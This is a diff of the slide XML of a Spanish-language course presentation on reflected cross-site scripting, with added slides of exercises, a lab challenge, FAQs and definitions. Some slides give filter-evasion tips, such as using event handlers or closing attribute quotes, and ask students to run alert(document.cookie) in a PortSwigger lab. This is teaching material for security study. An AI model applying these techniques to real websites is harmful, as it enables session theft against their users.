--- a/classes/parte-4-seguridad-de-aplicaciones-web/096-cross-site-scripting-xss-reflejado/clase-096-presentacion.pptx
+++ b/classes/parte-4-seguridad-de-aplicaciones-web/096-cross-site-scripting-xss-reflejado/clase-096-presentacion.pptx
@@ -17,6 +17,9 @@
     <p:sldId id="265" r:id="rId16"/>
     <p:sldId id="266" r:id="rId17"/>
     <p:sldId id="267" r:id="rId18"/>
+    <p:sldId id="268" r:id="rId19"/>
+    <p:sldId id="269" r:id="rId20"/>
+    <p:sldId id="270" r:id="rId21"/>
   </p:sldIdLst>
   <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -3198,7 +3201,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>⚠️ Errores comunes</a:t>
+              <a:t>✍️ Ejercicios</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3236,67 +3239,82 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  El payload aparece como texto — Está siendo codificado; busca otro contexto o sink</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  &lt;script&gt; no ejecuta — CSP o filtro; usa manejadores de evento</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  alert no salta pero el HTML cambia — Contexto de atributo; cierra la comilla primero</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Funciona en Burp pero no en el navegador — El navegador codifica la URL; ajusta encoding</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Cookie no se roba — HttpOnly activo; demuestra impacto de otra forma</a:t>
+              <a:t>•  Diseña un payload para contexto de atributo y otro para contexto de script.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Evade un filtro que elimina la palabra script (mayúsculas, anidado, eventos).</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Explica por qué HttpOnly no evita el XSS, solo mitiga el robo de cookie.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Escribe una CSP que bloquearía tu payload y explica cómo.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Diferencia reflejado, almacenado y DOM (adelanto de la próxima clase).</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Codifica la salida correctamente en un template server-side para eliminar el bug.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3347,7 +3365,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>❓ Preguntas frecuentes</a:t>
+              <a:t>📝 Reto verificable</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3385,82 +3403,22 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  ❓ ¿XSS reflejado necesita interacción de la víctima?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Sí: la víctima debe abrir el enlace malicioso. Por eso suele combinarse con phishing.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  ❓ ¿La codificación de entrada o de salida?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  De salida, según el contexto donde se escribe. La codificación de entrada es útil pero insuficiente por sí sola.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  ❓ ¿CSP elimina el XSS?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  No lo elimina, lo mitiga: aunque el bug exista, una buena CSP puede impedir que el script se ejecute.</a:t>
+              <a:t>•  Resuelve un lab de XSS reflejado de PortSwigger que requiera escapar de un contexto (atributo o script) y ejecutar alert(document.cookie).</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Criterio de aceptación: el lab queda marcado como resuelto, y explicas el contexto de inyección, el payload y qué codificación de salida lo habría prevenido.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3511,7 +3469,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>🔗 Referencias</a:t>
+              <a:t>⚠️ Errores comunes</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3549,6 +3507,319 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
+              <a:t>•  El payload aparece como texto — Está siendo codificado; busca otro contexto o sink</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  &lt;script&gt; no ejecuta — CSP o filtro; usa manejadores de evento</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  alert no salta pero el HTML cambia — Contexto de atributo; cierra la comilla primero</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Funciona en Burp pero no en el navegador — El navegador codifica la URL; ajusta encoding</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Cookie no se roba — HttpOnly activo; demuestra impacto de otra forma</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="320040"/>
+            <a:ext cx="8229600" cy="822960"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2600" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>❓ Preguntas frecuentes</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="TextBox 2"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="1280160"/>
+            <a:ext cx="8229600" cy="4937760"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿XSS reflejado necesita interacción de la víctima?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Sí: la víctima debe abrir el enlace malicioso. Por eso suele combinarse con phishing.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿La codificación de entrada o de salida?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  De salida, según el contexto donde se escribe. La codificación de entrada es útil pero insuficiente por sí sola.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿CSP elimina el XSS?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  No lo elimina, lo mitiga: aunque el bug exista, una buena CSP puede impedir que el script se ejecute.</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide14.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="320040"/>
+            <a:ext cx="8229600" cy="822960"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2600" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>🔗 Referencias</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="TextBox 2"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="1280160"/>
+            <a:ext cx="8229600" cy="4937760"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
               <a:t>•  Stuttard &amp; Pinto, The Web Application Hacker's Handbook, cap. 12.</a:t>
             </a:r>
           </a:p>
@@ -3599,6 +3870,81 @@
           </a:p>
         </p:txBody>
       </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide15.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="274320"/>
+            <a:ext cx="8229600" cy="640080"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2200" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Diagrama de la clase</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="3" name="Picture 2" descr="d48bf48872017662.png"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="3470148"/>
+            <a:ext cx="8229600" cy="557784"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
   </p:cSld>
   <p:clrMapOvr>
@@ -3683,7 +4029,7 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Comprender y explotar el XSS reflejado: cuando la aplicación devuelve input del usuario en la respuesta sin sanitizar, permitiendo ejecutar JavaScript en el navegador de la víctima. Es la puerta de entrada al mundo XSS y a los ataques del lado cliente.</a:t>
+              <a:t>•  Comprender y explotar el XSS reflejado: cuando la aplicación devuelve input del usuario en la respuesta sin sanitizar, permitiendo ejecutar JavaScript en el navegador de la víctima. Es la puerta de…</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4077,7 +4423,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>📖 Definiciones y características</a:t>
+              <a:t>🧠 Explicación en profundidad</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4115,82 +4461,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  XSS reflejado: el payload viaja en la petición y se refleja en la respuesta inmediata. Característica: requiere que la víctima abra un enlace preparado.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Contexto de inyección: dónde aterriza el input (cuerpo HTML, atributo, script, URL). Característica: determina la sintaxis del payload.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Output encoding: codificar caracteres especiales al escribir la salida. Característica: defensa principal contra XSS.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  CSP (Content Security Policy): cabecera que restringe orígenes de script. Característica: mitiga XSS aunque exista el bug.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Payload polyglot: cadena que funciona en varios contextos. Característica: útil para pruebas rápidas.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  HttpOnly: flag de cookie que la oculta a JavaScript. Característica: limita el robo de sesión vía XSS.</a:t>
+              <a:t>•  El Cross-Site Scripting es la inyección trasladada al navegador: en lugar de que datos del</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  usuario se interpreten como SQL en la base de datos, se interpretan como JavaScript en el</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  navegador de otra víctima. La causa raíz es idéntica —datos que cruzan la frontera y se</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  convierten en código— pero el intérprete es el navegador y el impacto se sufre en el cliente:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  robo de sesión, acciones en nombre de la víctima, keylogging, redirecciones. Que OWASP lo</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  clasifique dentro de A03 Injection (clase 087) no es casual: es la misma enfermedad en otro</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  órgano.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4241,7 +4602,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>🧰 Herramientas y preparación</a:t>
+              <a:t>📖 Definiciones y características</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4279,37 +4640,82 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  DVWA (XSS reflected), Juice Shop, PortSwigger labs.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Burp para probar variaciones y observar reflexiones.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Navegador con DevTools.</a:t>
+              <a:t>•  XSS reflejado: el payload viaja en la petición y se refleja en la respuesta inmediata. Característica: requiere que la víctima abra un enlace preparado.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Contexto de inyección: dónde aterriza el input (cuerpo HTML, atributo, script, URL). Característica: determina la sintaxis del payload.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Output encoding: codificar caracteres especiales al escribir la salida. Característica: defensa principal contra XSS.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  CSP (Content Security Policy): cabecera que restringe orígenes de script. Característica: mitiga XSS aunque exista el bug.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Payload polyglot: cadena que funciona en varios contextos. Característica: útil para pruebas rápidas.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  HttpOnly: flag de cookie que la oculta a JavaScript. Característica: limita el robo de sesión vía XSS.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4360,7 +4766,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>🧪 Laboratorio guiado</a:t>
+              <a:t>📔 Glosario</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4398,97 +4804,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  En DVWA → XSS (Reflected), envía tu nombre y busca dónde se refleja en el HTML.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
